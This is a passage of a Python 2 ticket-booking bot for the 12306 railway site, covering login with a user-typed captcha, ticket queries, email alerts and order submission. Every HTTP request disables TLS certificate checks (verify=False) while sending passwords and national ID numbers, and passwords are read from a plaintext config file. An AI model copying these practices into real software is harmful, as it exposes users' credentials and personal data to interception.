'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'x-requested-with': 'XMLHttpRequest'
},
'https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn//payOrder/init?': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'Content-Type': 'application/x-www-form-urlencoded'
},
'https://kyfw.12306.cn/otn/queryOrder/initNoComplete': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn//payOrder/init?random=1417862054369'
},
'https://kyfw.12306.cn/otn/queryOrder/queryMyOrderNoComplete': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/queryOrder/initNoComplete',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
}
}
l = [
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&',
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&',
'https://kyfw.12306.cn/otn/leftTicket/log?',
'https://kyfw.12306.cn/otn/leftTicket/query?',
'https://kyfw.12306.cn/otn/leftTicket/queryT?',
'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?',
'https://kyfw.12306.cn/otn//payOrder/init?'
]
for s in l:
if url.find(s) == 0:
url = s
if not url in d:
print(u'未知 url: %s' % url)
return RET_ERR
self.session.headers.update({'Referer': d[url]['Referer']})
keys = [
'Referer',
'Cache-Control',
'x-requested-with',
'Content-Type'
]
for key in keys:
if key in d[url]:
self.session.headers.update({key: d[url][key]})
else:
self.session.headers.update({key: None})
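# get()/post() below wrap requests in a simple retry loop: up to MAX_TRIES
# attempts, catching the common requests exceptions, returning the Response on
# HTTP 200 and None once all attempts fail.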
def get(self, url):
self.updateHeaders(url)
tries = 0
while tries < MAX_TRIES:
tries += 1
try:
r = self.session.get(url, verify=False, timeout=16)
except requests.exceptions.ConnectionError as e:
print('ConnectionError(%s): e=%s' % (url, e))
continue
except requests.exceptions.Timeout as e:
print('Timeout(%s): e=%s' % (url, e))
continue
except requests.exceptions.TooManyRedirects as e:
print('TooManyRedirects(%s): e=%s' % (url, e))
continue
except requests.exceptions.HTTPError as e:
print('HTTPError(%s): e=%s' % (url, e))
continue
except requests.exceptions.RequestException as e:
print('RequestException(%s): e=%s' % (url, e))
continue
except:
print('Unknown exception(%s)' % (url))
continue
if r.status_code != 200:
print('Request %s failed %d times, status_code=%d' % (
url,
tries,
r.status_code))
else:
return r
else:
return None
def post(self, url, payload):
self.updateHeaders(url)
if url == 'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn':
if payload.find('REPEAT_SUBMIT_TOKEN') != -1:
self.session.headers.update({'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'})
else:
self.session.headers.update({'Referer': 'https://kyfw.12306.cn/otn/login/init'})
tries = 0
while tries < MAX_TRIES:
tries += 1
try:
r = self.session.post(url, data=payload, verify=False, timeout=16)
except requests.exceptions.ConnectionError as e:
print('ConnectionError(%s): e=%s' % (url, e))
continue
except requests.exceptions.Timeout as e:
print('Timeout(%s): e=%s' % (url, e))
continue
except requests.exceptions.TooManyRedirects as e:
print('TooManyRedirects(%s): e=%s' % (url, e))
continue
except requests.exceptions.HTTPError as e:
print('HTTPError(%s): e=%s' % (url, e))
continue
except requests.exceptions.RequestException as e:
print('RequestException(%s): e=%s' % (url, e))
continue
except:
print('Unknown exception(%s)' % (url))
continue
if r.status_code != 200:
print('Request %s failed %d times, status_code=%d' % (
url,
tries,
r.status_code))
else:
return r
else:
return None
def getCaptcha(self, url):
self.updateHeaders(url)
r = self.session.get(url, verify=False, stream=True, timeout=16)
with open('captcha.gif', 'wb') as fd:
for chunk in r.iter_content():
fd.write(chunk)
print(u'请输入4位图片验证码(回车刷新验证码):')
captcha = raw_input()
if len(captcha) == 4:
return captcha
elif len(captcha) != 0:
print(u'%s是无效的图片验证码, 必须是4位' % (captcha))
return None
else:
            return 1  # refresh the captcha
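    # initStation(): download station_name.js from 12306 and build the global
    # station lookup table (abbr/name/telecode/pinyin).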
def initStation(self):
url = 'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js'
r = self.get(url)
if not r:
print(u'站点数据库初始化失败, 请求异常')
return None
data = r.text
station_list = data.split('@')
if len(station_list) < 1:
print(u'站点数据库初始化失败, 数据异常')
return None
station_list = station_list[1:]
for station in station_list:
items = station.split('|') # bji|北京|BJP|beijing|bj|2
if len(items) < 5:
print(u'忽略无效站点: %s' % (items))
continue
stations.append({'abbr': items[0],
'name': items[1],
'telecode': items[2],
'pinyin': items[3],
'pyabbr': items[4]})
return stations
def readConfig(self, config_file='config.ini'):
cp = ConfigParser.ConfigParser()
try:
cp.readfp(open(config_file, 'r'))
except IOError as e:
print(u'打开配置文件"%s"失败啦, 请先创建或者拷贝一份配置文件config.ini' % (config_file))
raw_input('Press any key to continue')
sys.exit()
self.username = cp.get('login', 'username')
self.password = cp.get('login', 'password')
self.train_date = cp.get('train', 'date')
self.from_city_name = cp.get('train', 'from')
self.to_city_name = cp.get('train', 'to')
self.notify['mail_enable'] = int(cp.get('notify', 'mail_enable'))
self.notify['mail_username'] = cp.get('notify', 'mail_username')
self.notify['mail_password'] = cp.get('notify', 'mail_password')
self.notify['mail_server'] = cp.get('notify', 'mail_server')
self.notify['mail_to'] = cp.get('notify', 'mail_to').split(',')
self.notify['dates'] = cp.get('notify', 'dates').split(',')
self.notify['trains'] = cp.get('notify', 'trains').split(',')
self.notify['xb'] = cp.get('notify', 'xb').split(',')
for t in self.notify['trains']:
self.notify['focus'][t] = self.notify['xb']
        # Validate the departure station
station = getStationByName(self.from_city_name)
if not station:
print(u'出发站错误, 请重新输入')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
        # Validate the destination station
station = getStationByName(self.to_city_name)
if not station:
print(u'目的站错误,请重新输入')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
        # Validate the travel date
if not checkDate(self.train_date):
print(u'乘车日期无效, 请重新选择')
self.train_date = selectDate()
        # Parse passenger sections from the config
self.passengers = []
index = 1
passenger_sections = ['passenger%d' % (i) for i in xrange(1, 6)]
sections = cp.sections()
for section in passenger_sections:
if section in sections:
passenger = {}
passenger['index'] = index
                passenger['name'] = cp.get(section, 'name')  # required
                # ID type: optional, defaults to '1' (second-generation ID card)
                passenger['cardtype'] = cp.get(section, 'cardtype') if cp.has_option(section, 'cardtype') else '1'
                passenger['id'] = cp.get(section, 'id')  # required
                # mobile number: optional
                passenger['phone'] = cp.get(section, 'phone') if cp.has_option(section, 'phone') else '13800138000'
                # seat class: optional, defaults to '1' (hard seat)
                passenger['seattype'] = cp.get(section, 'seattype') if cp.has_option(section, 'seattype') else '1'
                # ticket type: optional, defaults to '1' (adult)
                passenger['tickettype'] = cp.get(section, 'tickettype') if cp.has_option(section, 'tickettype') else '1'
self.passengers.append(passenger)
index += 1
def printConfig(self):
printDelimiter()
print(u'订票信息:\n%s\t%s\t%s--->%s' % (
self.username,
self.train_date,
self.from_city_name,
self.to_city_name))
printDelimiter()
th = [u'序号', u'姓名', u'证件类型', u'证件号码', u'席别', u'票种']
print(u'%s\t%s\t%s\t%s\t%s\t%s' % (
th[0].ljust(2), th[1].ljust(4), th[2].ljust(5),
th[3].ljust(12), th[4].ljust(2), th[5].ljust(3)))
for p in self.passengers:
print(u'%s\t%s\t%s\t%s\t%s\t%s' % (
p['index'],
p['name'].decode('utf-8', 'ignore').ljust(4),
getCardType(p['cardtype']).ljust(5),
p['id'].ljust(20),
getSeatType(p['seattype']).ljust(2),
getTicketType(p['tickettype']).ljust(3)))
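    # checkRandCodeAnsyn(): fetch the captcha for the given module ('login' or
    # 'passenger'), ask the user to solve it, then have 12306 validate the answer.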
def checkRandCodeAnsyn(self, module):
d = {
            'login': {  # login captcha
'rand': 'sjrand',
'referer': 'https://kyfw.12306.cn/otn/login/init'
},
            'passenger': {  # order-confirmation captcha
'rand': 'randp',
'referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
}
}
        if module not in d:
print(u'无效的 module: %s' % (module))
return RET_ERR
tries = 0
while tries < MAX_TRIES:
tries += 1
url = 'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=%s&rand=%s&' % (module, d[module]['rand'])
if tries > 1:
url = '%s%1.16f' % (url, random.random())
print(u'正在等待验证码...')
self.captcha = self.getCaptcha(url)
if not self.captcha:
continue
            if self.captcha == 1:  # a refresh does not count as an attempt
tries -= 1
continue
url = 'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn'
parameters = [
('randCode', self.captcha),
('rand', d[module]['rand'])
]
if module == 'login':
parameters.append(('randCode_validate', ''))
else:
parameters.append(('_json_att', ''))
parameters.append(('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken))
payload = urllib.urlencode(parameters)
print(u'正在校验验证码...')
r = self.post(url, payload)
if not r:
print(u'校验验证码异常')
continue
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"result":"1","msg":"randCodeRight"},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['result', 'msg'])
and (obj['data']['result'] == '1')):
print(u'校验验证码成功')
return RET_OK
else:
print(u'校验验证码失败')
dumpObj(obj)
continue
else:
return RET_ERR
def login(self):
url = 'https://kyfw.12306.cn/otn/login/init'
r = self.get(url)
if not r:
print(u'登录失败, 请求异常')
return RET_ERR
if self.session.cookies:
cookies = requests.utils.dict_from_cookiejar(self.session.cookies)
if cookies['JSESSIONID']:
self.jsessionid = cookies['JSESSIONID']
if self.checkRandCodeAnsyn('login') == RET_ERR:
return RET_ERR
print(u'正在登录...')
url = 'https://kyfw.12306.cn/otn/login/loginAysnSuggest'
parameters = [
('loginUserDTO.user_name', self.username),
('userDTO.password', self.password),
('randCode', self.captcha),
('randCode_validate', ''),
#('ODg3NzQ0', 'OTIyNmFhNmQwNmI5ZmQ2OA%3D%3D'),
('myversion', 'undefined')
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'登录失败, 请求异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"loginCheck":"Y"},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['loginCheck'])
and (obj['data']['loginCheck'] == 'Y')):
print(u'登陆成功^_^')
url = 'https://kyfw.12306.cn/otn/login/userLogin'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
return RET_OK
else:
print(u'登陆失败啦!重新登陆...')
dumpObj(obj)
return RET_ERR
def getPassengerDTOs(self):
url = 'https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs'
parameters = [
('', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'获取乘客信息异常')
return RET_ERR
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['normal_passengers'])
and obj['data']['normal_passengers']):
self.normal_passengers = obj['data']['normal_passengers']
return RET_OK
else:
print(u'获取乘客信息失败')
if hasKeys(obj, ['messages']):
dumpObj(obj['messages'])
if hasKeys(obj, ['data']) and hasKeys(obj['data'], ['exMsg']):
dumpObj(obj['data']['exMsg'])
return RET_ERR
def selectPassengers(self, prompt):
if prompt == 1:
print(u'是否重新选择乘客?(如需选择请输入y或者yes, 默认使用配置文件提供的乘客信息)')
act = raw_input()
act = act.lower()
if act != 'y' and act != 'yes':
self.printConfig()
return RET_OK
if not (self.normal_passengers and len(self.normal_passengers)):
tries = 0
while tries < MAX_TRIES:
tries += 1
if self.getPassengerDTOs() == RET_OK:
break
else:
print(u'获取乘客信息失败次数太多, 使用配置文件提供的乘客信息')
return RET_ERR
num = len(self.normal_passengers)
for i in xrange(0, num):
p = self.normal_passengers[i]
print(u'%d.%s \t' % (i + 1, p['passenger_name'])),
if (i + 1) % 5 == 0:
print('')
while True:
print(u'\n请选择乘车人(最多选择5个, 以逗号隔开, 如:1,2,3,4,5, 直接回车不选择, 使用配置文件中的乘客信息)')
buf = raw_input()
if not buf:
return RET_ERR
            pattern = re.compile(r'^[0-9,]*\d$')  # digits and commas only, must end with a digit
if pattern.match(buf):
break
else:
print(u'输入格式错误, 只能输入数字和逗号, 并且必须以数字结束, 如:1,2,3,4,5')
ids = buf.split(',')
if not (ids and 1 <= len(ids) <= 5):
return RET_ERR
seattype = selectSeatType()
ids = [int(id) for id in ids]
del self.passengers[:]
for id in ids:
if id < 1 or id > num:
print(u'不存在的联系人, 忽略')
else:
passenger = {}
id = id - 1
passenger['index'] = len(self.passengers) + 1
passenger['name'] = self.normal_passengers[id]['passenger_name']
passenger['cardtype'] = self.normal_passengers[id]['passenger_id_type_code']
passenger['id'] = self.normal_passengers[id]['passenger_id_no']
passenger['phone'] = self.normal_passengers[id]['mobile_no']
passenger['seattype'] = seattype
passenger['tickettype'] = self.normal_passengers[id]['passenger_type']
self.passengers.append(passenger)
self.printConfig()
return RET_OK
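    # queryTickets(): hit the leftTicket init/log/queryT endpoints in turn and
    # cache the returned train list in self.trains.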
def queryTickets(self):
self.canWebBuy = False
url = 'https://kyfw.12306.cn/otn/leftTicket/init'
parameters = [
('_json_att', ''),
('leftTicketDTO.from_station_name', self.from_city_name),
('leftTicketDTO.to_station_name', self.to_city_name),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('leftTicketDTO.train_date', self.train_date),
('back_train_date', self.back_train_date),
('purpose_codes', self.purpose_code),
('pre_step_flag', 'index')
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询车票异常')
url = 'https://kyfw.12306.cn/otn/leftTicket/log?'
parameters = [
('leftTicketDTO.train_date', self.train_date),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('purpose_codes', self.purpose_code),
]
url += urllib.urlencode(parameters)
r = self.get(url)
if not r:
print(u'查询车票异常')
url = 'https://kyfw.12306.cn/otn/leftTicket/queryT?'
parameters = [
('leftTicketDTO.train_date', self.train_date),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('purpose_codes', self.purpose_code),
]
url += urllib.urlencode(parameters)
r = self.get(url)
if not r:
print(u'查询车票异常')
return RET_ERR
obj = r.json()
if (hasKeys(obj, ['status', 'httpstatus', 'data']) and len(obj['data'])):
self.trains = obj['data']
return RET_OK
else:
print(u'查询车票失败')
if hasKeys(obj, ['messages']):
dumpObj(obj['messages'])
return RET_ERR
def sendMailNotification(self):
print(u'正在发送邮件提醒...')
me = u'订票提醒<%s>' % (self.notify['mail_username'])
msg = MIMEText(
self.notify['mail_content'],
_subtype='plain',
_charset='gb2312')
msg['Subject'] = u'余票信息'
msg['From'] = me
msg['To'] = ';'.join(self.notify['mail_to'])
try:
server = smtplib.SMTP()
server.connect(self.notify['mail_server'])
server.login(
self.notify['mail_username'],
self.notify['mail_password'])
server.sendmail(me, self.notify['mail_to'], msg.as_string())
server.close()
print(u'发送邮件提醒成功')
return True
except Exception as e:
print(u'发送邮件提醒失败, %s' % str(e))
return False
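    # printTrains(): render the query result as a table and, when notification
    # is enabled, build the mail body for watched trains and seat classes.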
def printTrains(self):
printDelimiter()
print(u'余票查询结果如下:')
print(u"%s\t%s--->%s\n'有':票源充足 '无':票已售完 '*':未到起售时间 '--':无此席别" % (
self.train_date,
self.from_city_name,
self.to_city_name))
printDelimiter()
print(u'序号/车次\t乘车站\t目的站\t一等\t二等\t软卧\t硬卧\t硬座\t无座')
seatTypeCode = {
'swz': '商务座',
'tz': '特等座',
'zy': '一等座',
'ze': '二等座',
'gr': '高级软卧',
'rw': '软卧',
'yw': '硬卧',
'rz': '软座',
'yz': '硬座',
'wz': '无座',
'qt': '其它',
}
        # TODO remaining-ticket counts and prices: https://kyfw.12306.cn/otn/leftTicket/queryTicketPrice?train_no=770000K77505&from_station_no=09&to_station_no=13&seat_types=1431&train_date=2014-01-01
        # yp_info=4022300000301440004610078033421007800536 decodes, 10 characters per seat class, as:
        # 4022300000 soft sleeper, 0 left
        # 3014400046 hard sleeper, 46 left
        # 1007803342 standing, 342 left
        # 1007800536 hard seat, 536 left
index = 1
self.notify['mail_content'] = ''
for train in self.trains:
t = train['queryLeftNewDTO']
status = '售完' if t['canWebBuy'] == 'N' else '预定'
i = 0
ypInfo = {
                'wz': {  # standing (no seat)
'price': 0,
'left': 0
},
                'yz': {  # hard seat
'price': 0,
'left': 0
},
                'yw': {  # hard sleeper
'price': 0,
'left': 0
},
                'rw': {  # soft sleeper
'price': 0,
'left': 0
},
}
            # Parse ticket prices and remaining seats from yp_info
while i < (len(t['yp_info']) / 10):
tmp = t['yp_info'][i * 10:(i + 1) * 10]
price = int(tmp[1:5])
left = int(tmp[-3:])
if tmp[0] == '1':
if tmp[6] == '3':
ypInfo['wz']['price'] = price
ypInfo['wz']['left'] = left
else:
ypInfo['yz']['price'] = price
ypInfo['yz']['left'] = left
elif tmp[0] == '3':
ypInfo['yw']['price'] = price
ypInfo['yw']['left'] = left
elif tmp[0] == '4':
ypInfo['rw']['price'] = price
ypInfo['rw']['left'] = left
i = i + 1
yz_price = u'硬座%s' % (
ypInfo['yz']['price']) if ypInfo['yz']['price'] else ''
yw_price = u'硬卧%s' % (
ypInfo['yw']['price']) if ypInfo['yw']['price'] else ''
print(u'(%d) %s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' % (
index,
t['station_train_code'],
                t['from_station_name'][0:3],  # keep at most the first 3 characters
                t['to_station_name'][0:3],  # keep at most the first 3 characters
t['zy_num'],
t['ze_num'],
ypInfo['rw']['left'] if ypInfo['rw']['left'] else t['rw_num'],
ypInfo['yw']['left'] if ypInfo['yw']['left'] else t['yw_num'],
#t['rz_num'],
ypInfo['yz']['left'] if ypInfo['yz']['left'] else t['yz_num'],
ypInfo['wz']['left'] if ypInfo['wz']['left'] else t['wz_num'],
#yz_price,
#yw_price
))
if t['canWebBuy'] == 'Y':
self.canWebBuy = True
index += 1
if self.notify['mail_enable'] == 1 and t['canWebBuy'] == 'Y':
msg = ''
prefix = u'[%s]车次%s[%s/%s->%s/%s, 历时%s]现在有票啦\n' % (
t['start_train_date'],
t['station_train_code'],
t['from_station_name'],
t['start_time'],
t['to_station_name'],
t['arrive_time'],
t['lishi'])
                if 'all' in self.notify['focus']:  # watching any train
                    if self.notify['focus']['all'][0] == 'all':  # any seat class
msg = prefix
                    else:  # specific seat classes
for seat in self.notify['focus']['all']:
if seat in ypInfo and ypInfo[seat]['left']:
msg += u'座位类型:%s, 剩余车票数量:%s, 票价:%s \n' % (
seat if seat not in seatTypeCode else seatTypeCode[seat],
ypInfo[seat]['left'],
ypInfo[seat]['price'])
if msg:
msg = prefix + msg + u'\n'
                elif t['station_train_code'] in self.notify['focus']:  # a watched train
                    # any seat class
if self.notify['focus'][t['station_train_code']][0] == 'all':
msg = prefix
                    else:  # specific seat classes
for seat in self.notify['focus'][t['station_train_code']]:
if seat in ypInfo and ypInfo[seat]['left']:
msg += u'座位类型:%s, 剩余车票数量:%s, 票价:%s \n' % (
seat if seat not in seatTypeCode else seatTypeCode[seat],
ypInfo[seat]['left'],
ypInfo[seat]['price'])
if msg:
msg = prefix + msg + u'\n'
self.notify['mail_content'] += msg
printDelimiter()
if self.notify['mail_enable'] == 1:
if self.notify['mail_content']:
self.sendMailNotification()
return RET_OK
else:
length = len(self.notify['dates'])
if length > 1:
self.train_date = self.notify['dates'][
random.randint(
0,
length -
1)]
return RET_ERR
else:
return RET_OK
    # Return value: -1 -> query again, 0 -> quit, 1..len(trains) -> selected train number
def selectAction(self):
ret = -1
self.current_train_index = 0
trains_num = len(self.trains)
print(u'您可以选择:')
if self.canWebBuy:
print(u'1~%d.选择车次开始订票' % (trains_num))
print(u'p.更换乘车人')
print(u's.更改席别')
print(u'd.更改乘车日期')
print(u'f.更改出发站')
print(u't.更改目的站')
print(u'a.同时更改乘车日期,出发站和目的站')
print(u'u.查询未完成订单')
print(u'c.查看订票信息')
print(u'r.刷票模式')
print(u'n.普通模式')
print(u'q.退出')
print(u'刷新车票请直接回车')
printDelimiter()
select = raw_input()
select = select.lower()
if select.isdigit():
if not self.canWebBuy:
print(u'没有可预订的车次, 请刷新车票或者更改查询条件')
return -1
index = int(select)
if index < 1 or index > trains_num:
print(u'输入的序号无效,请重新选择车次(1~%d)' % (trains_num))
index = selectTrain(self.trains)
if self.trains[index - 1]['queryLeftNewDTO']['canWebBuy'] != 'Y':
print(u'您选择的车次%s没票啦,请重新选择车次' % (self.trains[index - 1]['queryLeftNewDTO']['station_train_code']))
index = selectTrain(self.trains)
ret = index
self.current_train_index = index - 1
elif select == 'p':
self.selectPassengers(0)
elif select == 's':
seattype = selectSeatType()
for p in self.passengers:
p['seattype'] = seattype
self.printConfig()
elif select == 'd':
self.train_date = selectDate()
elif select == 'f':
print(u'请输入出发站:')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
elif select == 't':
print(u'请输入目的站:')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
elif select == 'a':
self.train_date = selectDate()
print(u'请输入出发站:')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
print(u'请输入目的站:')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
elif select == 'u':
ret = self.queryMyOrderNotComplete()
ret = self.selectAction()
elif select == 'c':
ret = self.printConfig()
ret = self.selectAction()
elif select == 'r':
self.notify['mail_enable'] = 1
ret = -1
elif select == 'n':
self.notify['mail_enable'] = 0
ret = -1
elif select == 'q':
ret = 0
return ret
def initOrder(self):
url = 'https://kyfw.12306.cn/otn/login/checkUser'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'初始化订单异常')
print(u'准备下单喽')
url = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest'
parameters = [
#('ODA4NzIx', 'MTU0MTczYmQ2N2I3MjJkOA%3D%3D'),
('myversion', 'undefined'),
('secretStr', self.trains[self.current_train_index]['secretStr']),
('train_date', self.train_date),
('back_train_date', self.back_train_date),
('tour_flag', self.tour_flag),
('purpose_codes', self.purpose_code),
('query_from_station_name', self.from_city_name),
('query_to_station_name', self.to_city_name),
('undefined', '')
]
        # TODO Note: oddly, this POST body must not be urlencoded, so urllib.urlencode(parameters) cannot be used here; build the payload by hand instead.
payload = ''
length = len(parameters)
for i in range(0, length):
payload += parameters[i][0] + '=' + parameters[i][1]
if i < (length - 1):
payload += '&'
r = self.post(url, payload)
if not r:
print(u'下单异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"messages":[],"validateMessages":{}}
obj = r.json()
if not (hasKeys(obj, ['status', 'httpstatus'])
and obj['status']):
print(u'下单失败啦')
dumpObj(obj)
return RET_ERR
print(u'订单初始化...')
self.session.close() # TODO
url = 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'订单初始化异常')
return RET_ERR
data = r.text
s = data.find('globalRepeatSubmitToken') # TODO
e = data.find('global_lang')
if s == -1 or e == -1:
print(u'找不到 globalRepeatSubmitToken')
return RET_ERR
buf = data[s:e]
s = buf.find("'")
e = buf.find("';")
if s == -1 or e == -1:
print(u'很遗憾, 找不到 globalRepeatSubmitToken')
return RET_ERR
self.repeatSubmitToken = buf[s + 1:e]
s = data.find('key_check_isChange')
e = data.find('leftDetails')
if s == -1 or e == -1:
print(u'找不到 key_check_isChange')
return RET_ERR
self.keyCheckIsChange = data[s + len('key_check_isChange') + 3:e - 3]
return RET_OK
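    # checkOrderInfo(): serialise the selected passengers into the two strings
    # 12306 expects (passengerTicketStr packs seat type, berth preference,
    # ticket type, name, card type, card number and phone; oldPassengerStr
    # repeats the name/card fields), then submit them for validation.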
def checkOrderInfo(self):
if self.checkRandCodeAnsyn('passenger') == RET_ERR:
return RET_ERR
passengerTicketStr = ''
oldPassengerStr = ''
        passenger_seat_detail = '0'  # TODO berth preference: 0 -> any, 1 -> lower, 2 -> middle, 3 -> upper
for p in self.passengers:
if p['index'] != 1:
passengerTicketStr += 'N_'
oldPassengerStr += '1_'
passengerTicketStr += '%s,%s,%s,%s,%s,%s,%s,' % (
p['seattype'],
passenger_seat_detail,
p['tickettype'],
p['name'],
p['cardtype'],
p['id'],
p['phone'])
oldPassengerStr += '%s,%s,%s,' % (
p['name'],
p['cardtype'],
p['id'])
passengerTicketStr += 'N'
oldPassengerStr += '1_'
self.passengerTicketStr = passengerTicketStr
self.oldPassengerStr = oldPassengerStr
print(u'检查订单...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo'
parameters = [
('cancel_flag', '2'), # TODO
('bed_level_order_num', '000000000000000000000000000000'), # TODO
('passengerTicketStr', self.passengerTicketStr),
('oldPassengerStr', self.oldPassengerStr),
('tour_flag', self.tour_flag),
('randCode', self.captcha),
#('NzA4MTc1', 'NmYyYzZkYWY2OWZkNzg2YQ%3D%3D'), # TODO
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'检查订单异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"submitStatus":true},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status']
and obj['data']['submitStatus']):
print(u'检查订单成功')
return RET_OK
else:
print(u'检查订单失败')
dumpObj(obj)
return RET_ERR
def getQueueCount(self):
print(u'查询排队情况...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount'
t = self.trains[self.current_train_index]['queryLeftNewDTO']
parameters = [
('train_date', date2UTC(self.train_date)),
('train_no', t['train_no']),
('stationTrainCode', t['station_train_code']),
('seatType', '1'), # TODO
('fromStationTelecode', t['from_station_telecode']),
('toStationTelecode', t['to_station_telecode']),
('leftTicket', t['yp_info']),
('purpose_codes', '00'), # TODO
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken)
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询排队情况异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"count":"0","ticket":"100985109710098535003021350212","op_2":"false","countT":"0","op_1":"false"},"messages":[],"validateMessages":{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['op_1', 'op_2'])
and obj['status']):
print(u'查询排队情况失败')
dumpObj(obj)
return RET_ERR
if obj['data']['op_1'] != 'false':
print(u'已有人先于您提交相同的购票需求, 到处理您的需求时可能已无票, 建议根据当前余票确定是否排队.')
if obj['data']['op_2'] != 'false':
print(u'目前排队人数已经超过余票张数,请您选择其他席别或车次,特此提醒。')
if 'ticket' in obj['data']:
print(u'排队详情:%s' % (obj['data']['ticket'])) # TODO
return RET_OK
def confirmSingleForQueue(self):
print(u'提交订单排队...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue'
t = self.trains[self.current_train_index]['queryLeftNewDTO']
parameters = [
('passengerTicketStr', self.passengerTicketStr),
('oldPassengerStr', self.oldPassengerStr),
('randCode', self.captcha),
('purpose_codes', '00'), # TODO
('key_check_isChange', self.keyCheckIsChange),
('leftTicketStr', t['yp_info']),
('train_location', t['location_code']),
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'提交订单排队异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"submitStatus":true},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
